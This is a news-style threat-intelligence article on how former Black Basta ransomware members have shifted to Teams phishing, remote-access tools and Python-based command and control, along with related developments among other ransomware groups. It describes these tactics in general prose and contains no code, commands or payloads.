The Evolving Tactics of Former Black Basta Members
Background of Black Basta
Former operatives associated with the notorious Black Basta ransomware group are reportedly shifting their techniques while continuing to exploit weaknesses in corporate security systems. Their recent activity reveals a trend towards utilizing email bombardment and Microsoft Teams phishing, which allows these cybercriminals to maintain long-term access to targeted networks.
New Techniques in Cyber Attacks
Recent analyses by ReliaQuest have uncovered that these attackers are now incorporating Python scripts into their malicious strategies. This involves the use of cURL requests to deploy harmful payloads, marking an evolution in their attack methodology. Reports indicate that despite setbacks following the leak of internal chat logs in February 2025, these attackers are adapting and regrouping effectively.
Phishing Techniques and Target Analysis
Between February and May 2025, a significant portion of Teams phishing attacks—approximately 50%—originated from onmicrosoft[.]com domains. Moreover, domains already compromised contributed to 42% of these attacks, raising alarms about their subtlety. This method allows attackers to mimic legitimate email traffic, making it harder for organizations to discern the threats.
Notably, victims within the finance, insurance, and construction sectors were specifically targeted through Teams phishing attempts masquerading as help desk representatives. Such tactics are not only alarming but also indicative of a premeditated strategy aimed at deceiving unsuspecting employees.
Aftermath of Black Basta
In light of the shutdown of Black Basta’s data-leak site, cybersecurity experts speculate that former members may have either pivoted to a different Ransomware-as-a-Service (RaaS) group or established a new organization altogether. One possibility is a connection to the CACTUS RaaS group, hinted at through references to large payments in leaked communications among Black Basta leaders.
Interestingly, since March 2025, CACTUS has not disclosed any new organizations on its data leak platform, which could point to a deliberate strategy to avoid detection. Another theory is that some affiliates may have joined forces with BlackLock, which appears to have affiliations with a ransomware cartel known as DragonForce.
Leveraging Access for Additional Attacks
Recently observed actions demonstrate that attackers are capitalizing on the access gained through Teams phishing to initiate remote desktop sessions using Quick Assist and AnyDesk tools. Once inside, they can download and execute malicious Python scripts from remote locations, establishing command-and-control (C2) communications with their target systems.
This newfound reliance on Python scripts represents a concerning trend likely to gain traction in future Teams phishing campaigns, according to cybersecurity experts. The strategy, akin to the Black Basta playbook, combines email spam and Teams phishing tactics alongside remote access applications.
The Rise of BlackSuit Ransomware
In a troubling development, the social engineering strategies employed by Black Basta have been adopted by the BlackSuit ransomware group. This crossover suggests a possible merging of tactics or even the integration of members between these groups.
Research by Rapid7 suggests that the initial access obtained through these attacks serves as a gateway to downloading and executing advanced variants of Java-based Remote Access Trojans (RATs), which were previously a hallmark of Black Basta operations. The current malware utilizes cloud services from Google and Microsoft to facilitate its operations, showcasing an alarming evolution of sophistication.
Current Developments in the Ransomware Landscape
The ransomware landscape is witnessing various shifts as multiple groups intensify their operations. Notably, the financially motivated Scattered Spider group is orchestrating campaigns against managed service providers (MSPs) and IT vendors, employing a "one-to-many" approach to infiltrate multiple organizations with a single breach. They exploit compromised accounts from major contractors to gain entry.
Additionally, the Qilin group has been actively targeting organizations by weaponizing vulnerabilities in Fortinet products. Meanwhile, the Play ransomware group has been linked to a wave of attacks on numerous entities since mid-2022, using various vulnerabilities to gain footholds.
In a particularly noteworthy leak, internal conflicts within the VanHelsing group has led to the exposure of its source code, revealing everything from the TOR keys to ransomware functionalities.
Conclusion
As cyber threats evolve, the use of Remote Access Trojans (RATs) becomes increasingly critical for attackers. These tools provide the ability to control infected systems remotely, allowing cybercriminals to exfiltrate data, monitor activities, and introduce additional malware into the environment. This adaptability and continuous evolution of tactics is a cause for concern among cybersecurity professionals, necessitating proactive defenses against an ever-changing threat landscape.
